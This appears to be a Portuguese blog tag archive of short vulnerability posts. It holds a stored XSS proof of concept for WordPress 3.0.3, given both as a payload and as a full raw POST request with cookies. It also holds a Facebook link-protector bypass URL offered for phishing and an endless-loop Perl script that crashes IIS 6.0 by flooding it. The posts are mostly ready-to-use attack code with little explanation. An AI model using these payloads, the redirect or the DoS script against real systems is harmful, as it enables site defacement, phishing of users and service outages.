Assinatura RSS

Arquivo da tag: Vulnerabilidade

WordPress 3.0.3 Stored XSS

Publicado em

Software: wordpress.org

Versão: 3.0.3

Browsers afetados: IE7,6 NS8.1

Autor: Saif

Xss na pagina de post usando estilo CSS

Poc: Postagem com "<IMG STYLE="xss:expression(alert('XSS'))">"

Ou vc pode usar raw request pra implantar o parâmetro com o XSS


POST /wordpress/wp-admin/post.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)
Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer:
http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1
Cookie:
wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C17562b2ebe444d17730a2bbee6ceba99;
wp-settings-time-1=1293196695; wp-settings-time-2=1293197912;
wp-settings-1=m3%3Dc%26editor%3Dhtml; wp-settings-2=editor%3Dhtml%26m5%3Do;
wp-settings-time-3=1293462654; wp-settings-3=editor%3Dhtml;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C7437e30b3242f455911b2b60daf35e48;
PHPSESSID=a1e7d9fcce3d072b31162c4acbbf1c37;
kaibb4443=80bdb2bb6b0274393cdd1e47a67eabbd;
AEFCookies2525[aefsid]=kmxp4rfme1af9edeqlsvtfatf4rvu9aq
Content-Type: application/x-www-form-urlencoded
Content-Length: 1655

_wpnonce=aad1243dc1&_wp_http_referer=/wordpress/wp-admin/post.php?post=145&action=edit&message=1&user_ID=3&action=editpost&originalaction=editpost&post_author=3&post_type=post&original_post_status=publish&referredby=http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1&_wp_original_http_referer=http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1&post_ID=145&autosavenonce=e35a537141&meta-box-order-nonce=718e35f130&closedpostboxesnonce=0203f58029&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=12&jj=27&aa=2010&hh=15&mn=31&ss=55&hidden_mm=12&cur_mm=12&hidden_jj=27&cur_jj=27&hidden_aa=2010&cur_aa=2010&hidden_hh=15&cur_hh=16&hidden_mn=31&cur_mn=02&original_publish=Update&save=Update&post_category[]=0&post_category[]=1&tax_input[post_tag]=&newtag[post_tag]=&post_title=&samplepermalinknonce=ffcbf222eb&content=<IMG+STYLE="xss:expression(alert('XSS'))">&excerpt=&trackback_url=&meta[108][key]=_edit_last&_ajax_nonce=257f6f6ad9&meta[108][value]=3&meta[111][key]=_edit_lock&_ajax_nonce=257f6f6ad9&meta[111][value]=1293465765&meta[116][key]=_encloseme&_ajax_nonce=257f6f6ad9&meta[116][value]=1&meta[110][key]=_wp_old_slug&_ajax_nonce=257f6f6ad9&meta[110][value]=&metakeyselect=#NONE#&metakeyinput=&metavalue=&_ajax_nonce-add-meta=61de41e725&advanced_view=1&comment_status=open&ping_status=open&add_comment_nonce=c32341570f&post_name=145

Facebook Link Redirect

Publicado em

 

Servidor: http://www.facebook.com

Risco: baixo

Autor: SpecTrum_Bill

Faz um bypass no protetor de link do facebook, possibilitando algum tipo de ataque de phishing.

PoC: http://www.facebook.com/l.php?u=https://unauthorizedaccess.wordpress.com&h=5a3db

Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) DoS

Publicado em

Produto afetado: Microsoft IIS 6.0
Exploit testado em:Windows Server 2003 SP2

Detalhes:

<% Dim variable variable = Request.Form(“FOOBAR”) %>

A variável faz uma requisição que suporta um limite de 40000 caracteres, se posto a mais que isso entrará em crash:

PoC Exploit

# IIS 6.0 ASP DoS PoC
# usage: perl IISdos.pl
use IO::Socket;
$|=1;
$host = $ARGV[0];
$script = $ARGV[1];
while(1) {
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 'http(80)',
Proto => 'tcp');
$write = "C=A&" x 40000;
print $sock "HEAD /$script HTTP/1.1\r\nHost: $host\r\n"
."Connection:Close\r\nContent-Type: application/x-www-form-urlencoded\r\n"
."Content-Length:". length($write) ."\r\n\r\n" . $write;
print ".";
while(<$sock>) {
print;
}
}

É por essas que eu gosto do apache ;o)

Stack Overflow em plataforma Windows Pt-br

Publicado em

Procurar BOFs e SOFs em ambientes linux é relativamente fácil, agora em windows é outra historia!

By mano: co1ote